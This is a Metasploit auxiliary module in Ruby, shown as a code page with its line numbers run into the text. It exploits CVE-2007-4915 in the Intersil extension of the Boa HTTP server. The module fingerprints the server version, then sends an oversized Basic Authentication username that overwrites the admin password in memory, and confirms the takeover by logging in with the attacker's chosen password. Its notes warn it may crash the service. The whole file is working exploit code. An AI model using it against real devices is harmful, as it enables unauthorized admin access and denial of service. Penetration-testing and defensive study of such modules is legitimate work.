Path: blob/master/modules/auxiliary/admin/http/intersil_pass_reset.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',13'Description' => %q{14The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.1115allows basic authentication bypass when the user string is greater16than 127 bytes long. The long string causes the password to be17overwritten in memory, which enables the attacker to reset the18password. In addition, the malicious attempt also may cause a19denial-of-service condition.2021Please note that you must set the request URI to the directory that22requires basic authentication in order to work properly.23},24'Author' => [25'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', # original discoverer26'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', # original discoverer27'Max Dietz <maxwell.r.dietz[at]gmail.com>' # metasploit module28],29'License' => MSF_LICENSE,30'References' => [31[ 'CVE', '2007-4915' ],32[ 'BID', '25676'],33[ 'PACKETSTORM', '59347']34],35'DisclosureDate' => '2007-09-10',36'Notes' => {37'Stability' => [CRASH_SERVICE_DOWN],38'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],39'Reliability' => []40}41)42)4344register_options(45[46OptString.new('TARGETURI', [ true, 'The request URI', '/']),47OptString.new('PASSWORD', [true, 'The password to set', 'pass'])48]49)50end5152def check53res = send_request_cgi({54'uri' => '/',55'method' => 'GET'56})5758if res && (m = res.headers['Server'].match(%r{Boa/(.*)}))59vprint_status("Boa Version Detected: #{m[1]}")60return Exploit::CheckCode::Safe if (m[1][0].ord - 48 > 0) # boa server wrong version61return Exploit::CheckCode::Safe if (m[1][3].ord - 48 > 4)6263return Exploit::CheckCode::Vulnerable64end6566return Exploit::CheckCode::Safe('Not a Boa Server!')67rescue Rex::ConnectionRefused68print_error('Connection refused by server.')69return Exploit::CheckCode::Safe70end7172def run73return if check != Exploit::CheckCode::Vulnerable7475uri = normalize_uri(target_uri.path)76uri << '/' if uri[-1, 1] != '/'7778res = send_request_cgi({79'uri' => uri,80'method' => 'GET',81'authorization' => basic_auth(Rex::Text.rand_text_alpha(127), datastore['PASSWORD'])82})8384if res.nil?85print_error('The server may be down')86return87end8889if res.code != 40190print_status("#{uri} does not have basic authentication enabled")91return92end9394print_status('Server still operational. Checking to see if password has been overwritten')95res = send_request_cgi({96'uri' => uri,97'method' => 'GET',98'authorization' => basic_auth('admin', datastore['PASSWORD'])99})100101if !res102print_error('Server timed out, will not continue')103return104end105106case res.code107when 200108print_good("Password reset successful with admin:#{datastore['PASSWORD']}")109when 401110print_error('Access forbidden. The password reset attempt did not work')111else112print_status("Unexpected response: Code #{res.code} encountered")113end114end115end116117118